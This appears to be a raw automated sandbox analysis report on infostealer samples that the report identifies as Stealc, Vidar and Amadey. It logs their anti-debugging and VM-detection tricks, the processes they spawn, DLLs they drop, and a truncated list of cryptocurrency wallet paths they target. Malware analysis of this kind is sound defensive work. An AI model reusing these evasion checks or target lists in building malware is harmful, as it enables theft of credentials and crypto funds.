Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8638A3 second address: 8638BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB1C8B21D3Fh 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8638BA second address: 8638C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863A68 second address: 863A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863A6C second address: 863A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB1C8D0EF6Eh 0x0000000f rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863A84 second address: 863A92 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863A92 second address: 863A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863A98 second address: 863A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863BF1 second address: 863BFE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 863BFE second address: 863C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 120FC12 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 143E692 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 68EDE7 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 68ECC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 824A2D instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 68C08E instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 82C697 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JJECFIECBG.exe	Special instruction interceptor: First address: 8B5C14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 76EDE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 76ECC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 904A2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 76C08E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 90C697 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 995C14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Special instruction interceptor: First address: 547BF0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Special instruction interceptor: First address: 713568 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Special instruction interceptor: First address: 77A757 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Documents\JJECFIECBG.exe

Code function: 19_2_04E704E7 rdtsc

19_2_04E704E7

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.3 %

Source: C:\Users\user\Desktop\file.exe TID: 7452	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7440	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7440	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7432	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7432	Thread sleep time: -92046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7552	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7444	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7444	Thread sleep time: -102051s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7424	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7424	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7428	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7428	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7948	Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7948	Thread sleep time: -2040000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7948	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\JJECFIECBG.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C97C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

1_2_6C97C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: file.exe, file.exe, 00000001.00000002.2759195382.000000000138B000.00000040.00000001.01000000.00000003.sdmp, JJECFIECBG.exe, JJECFIECBG.exe, 00000013.00000000.2739567441.0000000000804000.00000080.00000001.01000000.0000000B.sdmp, JJECFIECBG.exe, 00000013.00000002.2793308537.0000000000805000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000014.00000000.2764610671.00000000008E4000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000014.00000002.2820233833.00000000008E5000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000000.3249881909.00000000008E4000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000002.3406147669.00000000008E5000.00000040.00000001.01000000.0000000D.sdmp, 60949160aa.exe, 00000018.00000002.3404063993.00000000006CA000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe.19.dr, JJECFIECBG.exe.1.dr, random[1].exe.1.dr	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: EBFHJEGD.1.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EBFHJEGD.1.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: EBFHJEGD.1.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 60949160aa.exe, 00000018.00000002.3407506576.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: EBFHJEGD.1.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2760035051.0000000001895000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3409992236.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3409992236.0000000000C27000.00000004.00000020.00020000.00000000.sdmp, 60949160aa.exe, 00000018.00000002.3407506576.000000000111D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EBFHJEGD.1.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EBFHJEGD.1.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EBFHJEGD.1.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EBFHJEGD.1.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EBFHJEGD.1.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EBFHJEGD.1.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EBFHJEGD.1.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EBFHJEGD.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: EBFHJEGD.1.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: skotes.exe, 00000016.00000002.3409992236.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: EBFHJEGD.1.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EBFHJEGD.1.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EBFHJEGD.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000001.00000002.2759195382.000000000138B000.00000040.00000001.01000000.00000003.sdmp, JJECFIECBG.exe, 00000013.00000000.2739567441.0000000000804000.00000080.00000001.01000000.0000000B.sdmp, JJECFIECBG.exe, 00000013.00000002.2793308537.0000000000805000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000014.00000000.2764610671.00000000008E4000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000014.00000002.2820233833.00000000008E5000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000000.3249881909.00000000008E4000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000002.3406147669.00000000008E5000.00000040.00000001.01000000.0000000D.sdmp, 60949160aa.exe, 00000018.00000002.3404063993.00000000006CA000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe.19.dr, JJECFIECBG.exe.1.dr, random[1].exe.1.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EBFHJEGD.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EBFHJEGD.1.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Documents\JJECFIECBG.exe

Code function: 19_2_04E70C8A Start: 04E70C78 End: 04E70C74

19_2_04E70C8A

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Process queried: DebugPort

Source: C:\Users\user\Documents\JJECFIECBG.exe

Code function: 19_2_04E704E7 rdtsc

19_2_04E704E7

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C9C5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

1_2_6C9C5FF0

Source: C:\Users\user\Desktop\file.exe

1_2_6C963480

Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_0065652B mov eax, dword ptr fs:[00000030h]	19_2_0065652B
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_0065A302 mov eax, dword ptr fs:[00000030h]	19_2_0065A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_0073A302 mov eax, dword ptr fs:[00000030h]	20_2_0073A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_0073652B mov eax, dword ptr fs:[00000030h]	20_2_0073652B

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C99B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6C99B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C99B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C99B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6CB4AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JJECFIECBG.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JJECFIECBG.exe "C:\Users\user\Documents\JJECFIECBG.exe"	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe "C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe"

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6CB94760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6CB94760

Source: file.exe, file.exe, 00000001.00000002.2759195382.000000000138B000.00000040.00000001.01000000.00000003.sdmp, JJECFIECBG.exe, JJECFIECBG.exe, 00000013.00000002.2793542385.000000000084D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000014.00000002.2820508800.000000000092D000.00000040.00000001.01000000.0000000D.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C99B341 cpuid

1_2_6C99B341

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C9635A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

1_2_6C9635A0

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6CA98390 NSS_GetVersion,

1_2_6CA98390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 19.2.JJECFIECBG.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.skotes.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.skotes.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2819896687.0000000000701000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2793029147.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3404324717.0000000000701000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2758733046.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2185073918.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 